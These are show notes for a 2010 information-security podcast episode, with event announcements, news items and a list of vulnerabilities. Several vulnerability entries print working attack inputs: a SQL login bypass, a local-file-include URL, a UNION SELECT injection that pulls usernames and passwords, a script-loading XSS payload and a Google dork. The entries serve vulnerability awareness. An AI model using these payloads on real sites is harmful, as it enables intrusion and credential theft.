Episode 73 – N1H1

ISD Podcast Episode 73 for February 23, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

• MyHardDriveDied.com
  • Scott will be putting on his SANS version of the Data Recovery Class in Orlando at SANS 2010 March 8^th to 12^th. https://www.sans.org/registration/register.php?conferenceid=2191
  • Data Recovery Class April 12th to the 16th in Washington DC goto MyHardDriveDied.com or email smoulton at nicservices dot com for more information.
• The next DC404 meeting will be at Outerzone March 19th and 20th near the Atlanta airport. Here’s their site for more info: http://www.outerz0ne.org/
  • Starts early Saturday morning.
    http://www.wellesleyinnatlanta.com/

    W E L L E S L E Y   I N N
    ATLANTA AIRPORT HOTEL
    1377 Virginia Avenue
    Atlanta, GA 30344
    404-762-5111

• SANS Community Atlanta
  • SANS Audit 507: Auditing Networks, Perimeter and Systems March 15 – 20, 2010   (http://www.sans.org/atlanta-auditing-networks-perimeters-2010-cs)
  • SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010  (http://www.sans.org/atlanta-security-leadership-2010-cs)
  • SANS Security 566:  Implementing and Auditing the Twenty Critical Security Controls – In Depth  May 17 – 21, 2010  (http://www.sans.org/atlanta-critical-controls-2010-cs)
• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs, GA starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538).

Vulnerabilities of Interest:

1. The Linux kernel is subject to a RTO (Retransmission Timeouts) Remote Denial of Service Vulnerability.  Attackers can exploit this issue to cause an excessive load on CPU and network resources, denying service to legitimate users. Attackers can use readily available network utilities to exploit this issue.
2. WSC CMS is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Attackers can use a browser to exploit this issue. The following example is available:
   1- http://www.sample.com/public/backoffice
   2- login with “admin” as user name and ‘or’ as password
3. Gretech GOM Player is subject to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input. Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. GOM Player 2.1.21.4846 is vulnerable; other versions may also be affected.
4. Konversation IRC is subject to a remote denial-of-service vulnerability. An attacker may exploit this issue to crash the application, resulting in a denial-of-service condition.  Versions prior to Konversation 1.2.3 are vulnerable. An attacker can use readily available network utilities to exploit this issue.
5. vBseo is subject to a Local File Include vulnerability.  Version 3.1.0 is vulnerable, though other versions my be impacted. Exploit code is availabe: http://www.sample.com/[path]/vbseo.php?vbseoembedd=1&vbseourl=[LFI]
6. Official Portal 2007 is subject to multiple vulnerabilities, including SQL injection and Cross Site Scripting. Google Dork: “Official Portal 2007″ Exploit code is availabe. SQL injection: http://www.sample.com/?fa=content.detail&id=-72+union+select+1,concat_ws%280x3a,userid,username,pwd%29,3,4,5,6,7,8,9,10,11+from+tuser–
   Cross Site Scripting: http://www.sample.com/?fa=<SCRIPT/SRC=”http://site.com/xss.js”>&lt;/SCRIPT>

News Items of Interest:

News item 1:  http://gcn.com/articles/2010/02/19/nist-crypto-docs-021910.aspx

The National Institute of Standards and Technology has released two documents as part of its Cryptographic Key Management Project — a summary of a key management workshop held in June that explored the risks and challenges of handling cryptographic keys in new technological environments, and a draft of recommendations for agencies on transitioning to new algorithms and keys.

Key management is one of the most difficult tasks in cryptography, because a cryptographic algorithm or scheme is only as secure as the keys used to encrypt and decrypt data. The scalability and usability of the methods used to distribute keys are of particular concern. NIST’s key management project is an effort to improve the overall key management strategies to enhance the usability of cryptographic technology, provide scalability and support a global cryptographic key management infrastructure.

The first step in achieving those goals was a workshop NIST hosted in June that examined the obstacles in using the key management methodologies currently in use. It also covered alternative technologies that key management needs to accommodate and approaches for moving from current methodologies to more desireable methods.

The results of the workshop are summarized in NIST Interagency Report 7609. An approach to transitioning to new generations of keys and algorithms is provided in a draft of Special Publication 800-131, “Recommendation for the Transitioning of Cryptographic Algorithms and Key Sizes.”

News item 2: http://www.tzi.de/~edelkamp/secart

SECART – Second International Workshop on Security and Artificial Intelligence Atlanta, Georgia, July 11, 2010.  Workshop themes include both applied and theoretical results regarding the application of AI techniques to security problems (or, alternatively, novel security issues caused by the use of AI techniques).  Possible topics include but are not limited to the

following:

*  Knowledge Representation and Engineering for Cyber Security

*  Secure Web Services

*  Development of Trusted Software

*  Data Mining and Forensics

*  Automated Vulnerability Analysis

*  Automated Exploit and Attack Generation

*  Automated Alerting and Response

*  Diagnosis and Plan Recognition

*  Automating Security Analyses and Audits

*  Artificial Immune Systems

*  Privacy and Confidentiality

*  Intelligent User Interfaces for Security Applications

*  Security and Organizational Structure

WORKSHOP ORGANISERS

Chairs:

Mark Boddy

Adventium Labs

Minneapolis, USA

mark.boddy@adventiumlabs.org

Stefan Edelkamp

TZI

University Bremen, Germany

edelkamp@tzi.de

Robert P. Goldman

SIFT, LLC

Minneapolis, USA

rpgoldman@sift.info

Program Committee:

Lee Badger (NIST, US)

Bob Balzer (Teknowledge, US)

Mark Boddy (Adventium Labs, US)

Cas Cremers (ETH, Switzerland)

Stefan Edelkamp (U Bremen, G)

Chris Geib (U Edinburgh, GB)

Robert P. Goldman (SIFT, US)

Rachel Greenstadt (Drexel U, US)

Henry Kautz (U of Rochester, US)

Alessio Lomuscio (IC London, GB)

Norbert Pohlmann (IF(IS), G)

Anil Somayaji (Carleton U, CA)

Shannon Spires (Sandia Labs, US)

Tim Strayer (BBN Technologies, US)

Karsten Sohr (TZI Bremen, G)

Dan Thomsen (SIFT and CDA, US)

Luca Vigano (U Verona, I)

Yacine Zemali (LIFO, FR)

Deadline for submissions:   March 29, 2010

Notification of acceptance: April 15, 2010

Final versions due:         May 4, 2010

Articles should be submitted in pdf format of up to 8 pages in AAAI plain article style are to be submitted to the Easy Chair (https://www.easychair.org/login.cgi?conf=secart10) system by the March 29, 2010 deadline.

Attendance fees will be posted as they become available from AAAI. In the past, AAAI has permitted workshop-only registrations. SECART is affilliated with AAAI-10

News item 3: http://www.dailymail.co.uk/news/worldnews/article-1252738/Argentinian-hackers-plaster-countrys-flag-Falklands-newspaper-website-new-conflict-begins.html

Argentinian hackers drew first blood in the latest Falklands stand-off by plastering the country’s flag across the islands. newspaper website.

The computer attack came as a British oil rig was set to begin searching for oil after arriving in the South Atlantic waters from Scotland.

The Argentine activists hacked into the English-language Penguin News to post a flag on the home page and an audio recording of the song “March of the Malvinas,” Argentina’s name for the Falklands.

They also wrote ‘the islands are Argentine’ and claimed the move was a ‘tribute’ to the country’s soldiers who died during the Falklands War.

The material has now been removed.
News item 4: http://twitter.com/th3j35t3r
Infamous patriot hacker The Jester (th3j35t3r) has released a video demonstration of the XerXeS DoS attack as it is unleashed on the Taliban website www.alemarah.com.

The video release follows an earlier announcement that The Jester has been working to improve and automate aspects of the attack method, which unlike a DDoS attack, requires only one low spec machine to implement.
The Jester is always quick to point out his claim that his attacks produce absolutely no permanent damage to the target site, or any intermediary nodes.

All works represented here are compiled from various sources (email, IRC, forums, and original author/websites). If the original work is copyrighted it is presented under the fair use of a copyrighted work, Copyright Act of 1976, 17 U.S.C. § 107, for purposes of criticism, comment, news reporting, teaching, and research. No use is directly intended as an infringement of copyright. Attribution is always given to the original source, if known. To have any copyrighted material removed, please contact isdpodcast[at]isdpodcast[dot]com.